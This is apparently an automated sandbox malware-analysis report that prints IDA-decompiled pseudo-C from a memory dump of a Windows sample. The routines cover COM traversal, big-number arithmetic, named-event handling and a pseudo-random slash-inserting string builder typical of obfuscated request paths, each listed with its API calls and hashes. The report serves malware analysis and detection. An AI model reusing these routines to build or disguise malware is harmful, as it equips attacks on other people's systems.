                      				intOrPtr _t79;
                      				intOrPtr* _t83;
                      				intOrPtr* _t87;
                      				intOrPtr _t103;
                      				intOrPtr _t109;
                      				void* _t118;
                      				void* _t122;
                      				void* _t123;
                      				intOrPtr _t130;
                      
                      				_t123 = _t122 - 0x3c;
                      				_push( &_v8);
                      				_push(__eax);
                      				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                      				if(_t118 >= 0) {
                      					_t54 = _v8;
                      					_t103 =  *0x2bda348; // 0x9dd5a8
                      					_t5 = _t103 + 0x2bdb038; // 0x3050f485
                      					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                      					_t56 = _v8;
                      					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                      					if(_t118 >= 0) {
                      						__imp__#2(0x2bd9284);
                      						_v28 = _t57;
                      						if(_t57 == 0) {
                      							_t118 = 0x8007000e;
                      						} else {
                      							_t60 = _v32;
                      							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                      							_t87 = __imp__#6;
                      							_t118 = _t61;
                      							if(_t118 >= 0) {
                      								_t63 = _v24;
                      								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                      								if(_t118 >= 0) {
                      									_t130 = _v20;
                      									if(_t130 != 0) {
                      										_t67 = 3;
                      										_v64 = _t67;
                      										_v48 = _t67;
                      										_v56 = 0;
                      										_v40 = 0;
                      										if(_t130 > 0) {
                      											while(1) {
                      												_t68 = _v24;
                      												asm("movsd");
                      												asm("movsd");
                      												asm("movsd");
                      												asm("movsd");
                      												_t123 = _t123;
                      												asm("movsd");
                      												asm("movsd");
                      												asm("movsd");
                      												asm("movsd");
                      												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                      												if(_t118 < 0) {
                      													goto L16;
                      												}
                      												_t70 = _v8;
                      												_t109 =  *0x2bda348; // 0x9dd5a8
                      												_t28 = _t109 + 0x2bdb0e4; // 0x3050f1ff
                      												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                      												if(_t118 >= 0) {
                      													_t75 = _v16;
                      													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                      													if(_t118 >= 0 && _v12 != 0) {
                      														_t79 =  *0x2bda348; // 0x9dd5a8
                      														_t33 = _t79 + 0x2bdb078; // 0x76006f
                      														if(lstrcmpW(_v12, _t33) == 0) {
                      															_t83 = _v16;
                      															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                      														}
                      														 *_t87(_v12);
                      													}
                      													_t77 = _v16;
                      													 *((intOrPtr*)( *_t77 + 8))(_t77);
                      												}
                      												_t72 = _v8;
                      												 *((intOrPtr*)( *_t72 + 8))(_t72);
                      												_v40 = _v40 + 1;
                      												if(_v40 < _v20) {
                      													continue;
                      												}
                      												goto L16;
                      											}
                      										}
                      									}
                      								}
                      								L16:
                      								_t65 = _v24;
                      								 *((intOrPtr*)( *_t65 + 8))(_t65);
                      							}
                      							 *_t87(_v28);
                      						}
                      						_t58 = _v32;
                      						 *((intOrPtr*)( *_t58 + 8))(_t58);
                      					}
                      				}
                      				return _t118;
                      			}
                      Statement addresses: 0x02bd6ce4 0x02bd6ced 0x02bd6cee 0x02bd6cf2 0x02bd6cf8 0x02bd6cfe 0x02bd6d07 0x02bd6d0d 0x02bd6d17 0x02bd6d19 0x02bd6d1f 0x02bd6d24 0x02bd6d2f 0x02bd6d35 0x02bd6d3a 0x02bd6e5c 0x02bd6d40 0x02bd6d40 0x02bd6d4d 0x02bd6d53 0x02bd6d59 0x02bd6d5d 0x02bd6d63 0x02bd6d70 0x02bd6d74 0x02bd6d7a 0x02bd6d7d 0x02bd6d85 0x02bd6d86 0x02bd6d8a 0x02bd6d8e 0x02bd6d91 0x02bd6d94 0x02bd6d9a 0x02bd6da3 0x02bd6da9 0x02bd6daa 0x02bd6dad 0x02bd6dae 0x02bd6daf 0x02bd6db7 0x02bd6db8 0x02bd6db9 0x02bd6dbb 0x02bd6dbf 0x02bd6dc3 0x00000000 0x00000000 0x02bd6dc9 0x02bd6dd2 0x02bd6dd8 0x02bd6de2 0x02bd6de6 0x02bd6de8 0x02bd6df5 0x02bd6df9 0x02bd6e01 0x02bd6e06 0x02bd6e18 0x02bd6e1a 0x02bd6e20 0x02bd6e20 0x02bd6e29 0x02bd6e29 0x02bd6e2b 0x02bd6e31 0x02bd6e31 0x02bd6e34 0x02bd6e3a 0x02bd6e3d 0x02bd6e46 0x00000000 0x00000000 0x00000000 0x02bd6e46 0x02bd6d9a 0x02bd6d94 0x02bd6d7d 0x02bd6e4c 0x02bd6e4c 0x02bd6e52 0x02bd6e52 0x02bd6e58 0x02bd6e58 0x02bd6e61 0x02bd6e67 0x02bd6e67 0x02bd6d24 0x02bd6e70

                      APIs
                      • SysAllocString.OLEAUT32(02BD9284), ref: 02BD6D2F
                      • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02BD6E10
                      • SysFreeString.OLEAUT32(00000000), ref: 02BD6E29
                      • SysFreeString.OLEAUT32(?), ref: 02BD6E58
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: String$Free$Alloclstrcmp
                      • String ID:
                      • API String ID: 1885612795-0
                      • Opcode ID: ea43d92c5e39b76d3f5d2179cbb98ef88b87a204e4863b4a88800bad4a656a7a
                      • Instruction ID: 2fbb995ce22e775d25a9662199435374fbe1e191a6f14530eae1b7bf97ece663
                      • Opcode Fuzzy Hash: ea43d92c5e39b76d3f5d2179cbb98ef88b87a204e4863b4a88800bad4a656a7a
                      • Instruction Fuzzy Hash: A1513F75D0050AEFCB01DFB8D4889EEB7BAFF88705B154594E915EB210E731AD41CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SysAllocString.OLEAUT32(?), ref: 02BD59B8
                      • SysFreeString.OLEAUT32(00000000), ref: 02BD5A9D
                        • Part of subcall function 02BD6CDF: SysAllocString.OLEAUT32(02BD9284), ref: 02BD6D2F
                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 02BD5AF0
                      • SysFreeString.OLEAUT32(00000000), ref: 02BD5AFF
                        • Part of subcall function 02BD77E3: Sleep.KERNEL32(000001F4), ref: 02BD782B
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: String$AllocFree$ArrayDestroySafeSleep
                      • String ID:
                      • API String ID: 3193056040-0
                      • Opcode ID: 0b3fd878d99276ba9297cddc758660a6cc5bdb539bf5756c8cf3c11b6b0a267c
                      • Instruction ID: 92db5fbe79ebba41b4f2b454eb7056063d4396741d6afc6c70b7b26cf0d6dfe3
                      • Opcode Fuzzy Hash: 0b3fd878d99276ba9297cddc758660a6cc5bdb539bf5756c8cf3c11b6b0a267c
                      • Instruction Fuzzy Hash: 25519E35900609AFCB11CFA8C884ADEB7B6FF88744F558869E518DB210FB30ED49CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E02BD4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				void _v156;
                      				void _v428;
                      				void* _t55;
                      				unsigned int _t56;
                      				signed int _t66;
                      				signed int _t74;
                      				void* _t76;
                      				signed int _t79;
                      				void* _t81;
                      				void* _t92;
                      				void* _t96;
                      				signed int* _t99;
                      				signed int _t101;
                      				signed int _t103;
                      				void* _t107;
                      
                      				_t92 = _a12;
                      				_t101 = __eax;
                      				_t55 = E02BD61EF(_a16, _t92);
                      				_t79 = _t55;
                      				if(_t79 == 0) {
                      					L18:
                      					return _t55;
                      				}
                      				_t56 =  *(_t92 + _t79 * 4 - 4);
                      				_t81 = 0;
                      				_t96 = 0x20;
                      				if(_t56 == 0) {
                      					L4:
                      					_t97 = _t96 - _t81;
                      					_v12 = _t96 - _t81;
                      					E02BD6725(_t79,  &_v428);
                      					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02BD7477(_t101,  &_v428, _a8, _t96 - _t81);
                      					E02BD7477(_t79,  &_v156, _a12, _t97);
                      					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                      					_t66 = E02BD6725(_t101, 0x2bda1d0);
                      					_t103 = _t101 - _t79;
                      					_a8 = _t103;
                      					if(_t103 < 0) {
                      						L17:
                      						E02BD6725(_a16, _a4);
                      						E02BD7894(_t79,  &_v428, _a4, _t97);
                      						memset( &_v428, 0, 0x10c);
                      						_t55 = memset( &_v156, 0, 0x84);
                      						goto L18;
                      					}
                      					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                      					do {
                      						if(_v8 != 0xffffffff) {
                      							_push(1);
                      							_push(0);
                      							_push(0);
                      							_push( *_t99);
                      							L02BD82DA();
                      							_t74 = _t66 +  *(_t99 - 4);
                      							asm("adc edx, esi");
                      							_push(0);
                      							_push(_v8 + 1);
                      							_push(_t92);
                      							_push(_t74);
                      							L02BD82D4();
                      							if(_t92 > 0 || _t74 > 0xffffffff) {
                      								_t74 = _t74 | 0xffffffff;
                      								_v16 = _v16 & 0x00000000;
                      							}
                      						} else {
                      							_t74 =  *_t99;
                      						}
                      						_t106 = _t107 + _a8 * 4 - 0x1a8;
                      						_a12 = _t74;
                      						_t76 = E02BD5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                      						while(1) {
                      							 *_t99 =  *_t99 - _t76;
                      							if( *_t99 != 0) {
                      								goto L14;
                      							}
                      							L13:
                      							_t92 =  &_v156;
                      							if(E02BD6E71(_t79, _t92, _t106) < 0) {
                      								break;
                      							}
                      							L14:
                      							_a12 = _a12 + 1;
                      							_t76 = E02BD10A0(_t79,  &_v156, _t106, _t106);
                      							 *_t99 =  *_t99 - _t76;
                      							if( *_t99 != 0) {
                      								goto L14;
                      							}
                      							goto L13;
                      						}
                      						_a8 = _a8 - 1;
                      						_t66 = _a12;
                      						_t99 = _t99 - 4;
                      						 *(0x2bda1d0 + _a8 * 4) = _t66;
                      					} while (_a8 >= 0);
                      					_t97 = _v12;
                      					goto L17;
                      				}
                      				while(_t81 < _t96) {
                      					_t81 = _t81 + 1;
                      					_t56 = _t56 >> 1;
                      					if(_t56 != 0) {
                      						continue;
                      					}
                      					goto L4;
                      				}
                      				goto L4;
                      			}
                      Statement addresses: 0x02bd4784 0x02bd4790 0x02bd4796 0x02bd479b 0x02bd479f 0x02bd4911 0x02bd4915 0x02bd4915 0x02bd47a5 0x02bd47a9 0x02bd47ad 0x02bd47b0 0x02bd47bb 0x02bd47c1 0x02bd47c6 0x02bd47c9 0x02bd47e3 0x02bd47f2 0x02bd47fe 0x02bd4808 0x02bd480d 0x02bd480f 0x02bd4812 0x02bd48c9 0x02bd48cf 0x02bd48e0 0x02bd48f3 0x02bd4909 0x00000000 0x02bd490e 0x02bd481b 0x02bd4822 0x02bd4826 0x02bd482c 0x02bd482e 0x02bd4830 0x02bd4832 0x02bd4834 0x02bd483e 0x02bd4843 0x02bd4845 0x02bd4847 0x02bd4848 0x02bd4849 0x02bd484a 0x02bd4851 0x02bd4858 0x02bd485b 0x02bd485b 0x02bd4828 0x02bd4828 0x02bd4828 0x02bd4863 0x02bd486b 0x02bd4877 0x02bd487c 0x02bd487c 0x02bd4881 0x00000000 0x00000000 0x02bd4883 0x02bd4886 0x02bd4893 0x00000000 0x00000000 0x02bd4895 0x02bd4895 0x02bd48a2 0x02bd487c 0x02bd4881 0x00000000 0x00000000 0x00000000 0x02bd4881 0x02bd48ac 0x02bd48af 0x02bd48b2 0x02bd48b9 0x02bd48b9 0x02bd48c6 0x00000000 0x02bd48c6 0x02bd47b2 0x02bd47b6 0x02bd47b7 0x02bd47b9 0x00000000 0x00000000 0x00000000 0x02bd47b9 0x00000000

                      APIs
                      • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02BD4834
                      • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02BD484A
                      • memset.NTDLL ref: 02BD48F3
                      • memset.NTDLL ref: 02BD4909
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: memset$_allmul_aulldiv
                      • String ID:
                      • API String ID: 3041852380-0
                      • Opcode ID: 78be993eb0487be1aa2a307478f4590b1a43cf50b4e988ac3a175177041df375
                      • Instruction ID: 591e7562cea16f49d74be05ba4f67a2d50e34cfc9a4d03c213dc3141d05a5667
                      • Opcode Fuzzy Hash: 78be993eb0487be1aa2a307478f4590b1a43cf50b4e988ac3a175177041df375
                      • Instruction Fuzzy Hash: E841A071A00259AFDB109F68DC80BEE777AEF45350F0045A9F959A7280FB70AE54CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E02BD49D0(signed int _a4, signed int* _a8) {
                      				void* __ecx;
                      				void* __edi;
                      				signed int _t6;
                      				intOrPtr _t8;
                      				intOrPtr _t12;
                      				short* _t19;
                      				void* _t25;
                      				signed int* _t28;
                      				CHAR* _t30;
                      				long _t31;
                      				intOrPtr* _t32;
                      
                      				_t6 =  *0x2bda310; // 0xd448b889
                      				_t32 = _a4;
                      				_a4 = _t6 ^ 0x109a6410;
                      				_t8 =  *0x2bda348; // 0x9dd5a8
                      				_t3 = _t8 + 0x2bdb7b4; // 0x61636f4c
                      				_t25 = 0;
                      				_t30 = E02BD74EC(_t3, 1);
                      				if(_t30 != 0) {
                      					_t25 = CreateEventA(0x2bda34c, 1, 0, _t30);
                      					E02BD61DA(_t30);
                      				}
                      				_t12 =  *0x2bda2fc; // 0x2000000a
                      				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02BD30D5() != 0) {
                      					L12:
                      					_t28 = _a8;
                      					if(_t28 != 0) {
                      						 *_t28 =  *_t28 | 0x00000001;
                      					}
                      					_t31 = E02BD37DF(_t32, 0);
                      					if(_t31 == 0 && _t25 != 0) {
                      						_t31 = WaitForSingleObject(_t25, 0x4e20);
                      					}
                      					if(_t28 != 0 && _t31 != 0) {
                      						 *_t28 =  *_t28 & 0xfffffffe;
                      					}
                      					goto L20;
                      				} else {
                      					_t19 =  *0x2bda124( *_t32, 0x20);
                      					if(_t19 != 0) {
                      						 *_t19 = 0;
                      						_t19 = _t19 + 2;
                      					}
                      					_t31 = E02BD23C4(0,  *_t32, _t19, 0);
                      					if(_t31 == 0) {
                      						if(_t25 == 0) {
                      							L22:
                      							return _t31;
                      						}
                      						_t31 = WaitForSingleObject(_t25, 0x4e20);
                      						if(_t31 == 0) {
                      							L20:
                      							if(_t25 != 0) {
                      								CloseHandle(_t25);
                      							}
                      							goto L22;
                      						}
                      					}
                      					goto L12;
                      				}
                      			}
                      Statement addresses: 0x02bd49d1 0x02bd49d8 0x02bd49e2 0x02bd49e6 0x02bd49ec 0x02bd49fb 0x02bd4a02 0x02bd4a06 0x02bd4a18 0x02bd4a1a 0x02bd4a1a 0x02bd4a1f 0x02bd4a26 0x02bd4a7d 0x02bd4a7d 0x02bd4a83 0x02bd4a85 0x02bd4a85 0x02bd4a8f 0x02bd4a93 0x02bd4aa5 0x02bd4aa5 0x02bd4aa9 0x02bd4aaf 0x02bd4aaf 0x00000000 0x02bd4a3f 0x02bd4a44 0x02bd4a4c 0x02bd4a50 0x02bd4a54 0x02bd4a54 0x02bd4a61 0x02bd4a65 0x02bd4a69 0x02bd4abe 0x02bd4ac4 0x02bd4ac4 0x02bd4a77 0x02bd4a7b 0x02bd4ab2 0x02bd4ab4 0x02bd4ab7 0x02bd4ab7 0x00000000 0x02bd4ab4 0x02bd4a7b 0x00000000 0x02bd4a65

                      APIs
                        • Part of subcall function 02BD74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,035B9E40,00000000,?,?,43175AC3,00000005,02BDA00C,4D283A53,?,?), ref: 02BD7522
                        • Part of subcall function 02BD74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 02BD7546
                        • Part of subcall function 02BD74EC: lstrcat.KERNEL32(00000000,00000000), ref: 02BD754E
                      • CreateEventA.KERNEL32(02BDA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02BD6A95,?,?,?), ref: 02BD4A11
                        • Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6
                      • WaitForSingleObject.KERNEL32(00000000,00004E20,02BD6A95,00000000,00000000,?,00000000,?,02BD6A95,?,?,?), ref: 02BD4A71
                      • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02BD6A95,?,?,?), ref: 02BD4A9F
                      • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02BD6A95,?,?,?), ref: 02BD4AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                      • String ID:
                      • API String ID: 73268831-0
                      • Opcode ID: 418efcfdda731d31b272f16207887050dbc7e9e1e44ef7555bcd91589d4d7dee
                      • Instruction ID: cac9664d55d3f76223643309071e43f39f9665ea91bbb39f7e291a90aa37baec
                      • Opcode Fuzzy Hash: 418efcfdda731d31b272f16207887050dbc7e9e1e44ef7555bcd91589d4d7dee
                      • Instruction Fuzzy Hash: C9214932A417515BC7319A689C44BEB73FDEF48B28B0506A5FD65D7140FB70C8049B48
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 39%
                      			E02BD69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                      				intOrPtr _v12;
                      				void* _v16;
                      				void* _v28;
                      				char _v32;
                      				void* __esi;
                      				void* _t29;
                      				void* _t38;
                      				signed int* _t39;
                      				void* _t40;
                      
                      				_t36 = __ecx;
                      				_v32 = 0;
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				asm("stosd");
                      				_v12 = _a4;
                      				_t38 = E02BD2A3D(__ecx,  &_v32);
                      				if(_t38 != 0) {
                      					L12:
                      					_t39 = _a8;
                      					L13:
                      					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                      						_t23 =  &(_t39[1]);
                      						if(_t39[1] != 0) {
                      							E02BD28B3(_t23);
                      						}
                      					}
                      					return _t38;
                      				}
                      				if(E02BD6ADC(0x40,  &_v16) != 0) {
                      					_v16 = 0;
                      				}
                      				_t40 = CreateEventA(0x2bda34c, 1, 0,  *0x2bda3e4);
                      				if(_t40 != 0) {
                      					SetEvent(_t40);
                      					Sleep(0xbb8);
                      					CloseHandle(_t40);
                      				}
                      				_push( &_v32);
                      				if(_a12 == 0) {
                      					_t29 = E02BD5704(_t36);
                      				} else {
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					_t29 = E02BD4C94(_t36);
                      				}
                      				_t41 = _v16;
                      				_t38 = _t29;
                      				if(_v16 != 0) {
                      					E02BD7220(_t41);
                      				}
                      				if(_t38 != 0) {
                      					goto L12;
                      				} else {
                      					_t39 = _a8;
                      					_t38 = E02BD49D0( &_v32, _t39);
                      					goto L13;
                      				}
                      			}
                      Statement addresses: 0x02bd69e6 0x02bd69f3 0x02bd69f9 0x02bd69fa 0x02bd69fb 0x02bd69fc 0x02bd69fd 0x02bd6a01 0x02bd6a0d 0x02bd6a11 0x02bd6a99 0x02bd6a99 0x02bd6a9c 0x02bd6a9e 0x02bd6aa6 0x02bd6aac 0x02bd6aaf 0x02bd6aaf 0x02bd6aac 0x02bd6aba 0x02bd6aba 0x02bd6a24 0x02bd6a26 0x02bd6a26 0x02bd6a3d 0x02bd6a41 0x02bd6a44 0x02bd6a4f 0x02bd6a56 0x02bd6a56 0x02bd6a5f 0x02bd6a63 0x02bd6a71 0x02bd6a65 0x02bd6a65 0x02bd6a66 0x02bd6a67 0x02bd6a68 0x02bd6a69 0x02bd6a6a 0x02bd6a6a 0x02bd6a76 0x02bd6a79 0x02bd6a7d 0x02bd6a7f 0x02bd6a7f 0x02bd6a86 0x00000000 0x02bd6a88 0x02bd6a88 0x02bd6a95 0x00000000 0x02bd6a95

                      APIs
                      • CreateEventA.KERNEL32(02BDA34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 02BD6A37
                      • SetEvent.KERNEL32(00000000), ref: 02BD6A44
                      • Sleep.KERNEL32(00000BB8), ref: 02BD6A4F
                      • CloseHandle.KERNEL32(00000000), ref: 02BD6A56
                        • Part of subcall function 02BD5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,02BD6A76,?,02BD6A76,?,?,?,?,?,02BD6A76,?), ref: 02BD57DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                      • String ID:
                      • API String ID: 2559942907-0
                      • Opcode ID: 30abd0f1fc6273d3cf6124522d0f90cf23b2c24a74e785c26ab3b0dbdb6ce6e5
                      • Instruction ID: 0f52db32c0656a85ce123e68ddb7c680fe3652c513417b7ee21e590e79832a42
                      • Opcode Fuzzy Hash: 30abd0f1fc6273d3cf6124522d0f90cf23b2c24a74e785c26ab3b0dbdb6ce6e5
                      • Instruction Fuzzy Hash: 9721C973D0011AAFCF20AFE4E4849DE77BDEF04354B4584A5EA61E7100F7359985CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E02BD4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                      				intOrPtr _v8;
                      				void* _v12;
                      				void* _v16;
                      				intOrPtr _t26;
                      				intOrPtr* _t28;
                      				intOrPtr _t31;
                      				intOrPtr* _t32;
                      				void* _t39;
                      				int _t46;
                      				intOrPtr* _t47;
                      				int _t48;
                      
                      				_t47 = __eax;
                      				_push( &_v12);
                      				_push(__eax);
                      				_t39 = 0;
                      				_t46 = 0;
                      				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                      				_v8 = _t26;
                      				if(_t26 < 0) {
                      					L13:
                      					return _v8;
                      				}
                      				if(_v12 == 0) {
                      					Sleep(0xc8);
                      					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                      				}
                      				if(_v8 >= _t39) {
                      					_t28 = _v12;
                      					if(_t28 != 0) {
                      						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                      						_v8 = _t31;
                      						if(_t31 >= 0) {
                      							_t46 = lstrlenW(_v16);
                      							if(_t46 != 0) {
                      								_t46 = _t46 + 1;
                      								_t48 = _t46 + _t46;
                      								_t39 = E02BD33DC(_t48);
                      								if(_t39 == 0) {
                      									_v8 = 0x8007000e;
                      								} else {
                      									memcpy(_t39, _v16, _t48);
                      								}
                      								__imp__#6(_v16);
                      							}
                      						}
                      						_t32 = _v12;
                      						 *((intOrPtr*)( *_t32 + 8))(_t32);
                      					}
                      					 *_a4 = _t39;
                      					 *_a8 = _t46 + _t46;
                      				}
                      				goto L13;
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: FreeSleepStringlstrlenmemcpy
                      • String ID:
                      • API String ID: 1198164300-0
                      • Opcode ID: efb2fde64e1fbbb29cb98316b02c987108799d30a6f8bcc4dd85e2360503b8b6
                      • Instruction ID: 2ab22c59bc99252956c7937a0d15de6d6dc8270eabb9a78123c2d549940fb1e3
                      • Opcode Fuzzy Hash: efb2fde64e1fbbb29cb98316b02c987108799d30a6f8bcc4dd85e2360503b8b6
                      • Instruction Fuzzy Hash: AC214F75901209EFCB11DFA8D9949DEBBB9FF49358B1481A9E905E7200FB30EA41CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E02BD2708(unsigned int __eax, void* __ecx) {
                      				void* _v8;
                      				void* _v12;
                      				signed int _t21;
                      				signed short _t23;
                      				char* _t27;
                      				void* _t29;
                      				void* _t30;
                      				unsigned int _t33;
                      				void* _t37;
                      				unsigned int _t38;
                      				void* _t41;
                      				void* _t42;
                      				int _t45;
                      				void* _t46;
                      
                      				_t42 = __eax;
                      				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                      				_t38 = __eax;
                      				_t30 = RtlAllocateHeap( *0x2bda2d8, 0, (__eax >> 3) + __eax + 1);
                      				_v12 = _t30;
                      				if(_t30 != 0) {
                      					_v8 = _t42;
                      					do {
                      						_t33 = 0x18;
                      						if(_t38 <= _t33) {
                      							_t33 = _t38;
                      						}
                      						_t21 =  *0x2bda2f0; // 0xdd708feb
                      						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                      						 *0x2bda2f0 = _t23;
                      						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                      						memcpy(_t30, _v8, _t45);
                      						_v8 = _v8 + _t45;
                      						_t27 = _t30 + _t45;
                      						_t38 = _t38 - _t45;
                      						_t46 = _t46 + 0xc;
                      						 *_t27 = 0x2f;
                      						_t13 = _t27 + 1; // 0x1
                      						_t30 = _t13;
                      					} while (_t38 > 8);
                      					memcpy(_t30, _v8, _t38 + 1);
                      				}
                      				return _v12;
                      			}

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BD6708,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD2713
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BD272B
                      • memcpy.NTDLL(00000000,035B9600,-00000008,?,?,?,02BD6708,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD276F
                      • memcpy.NTDLL(00000001,035B9600,00000001,02BD3ECE,00000000,035B9600), ref: 02BD2790
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
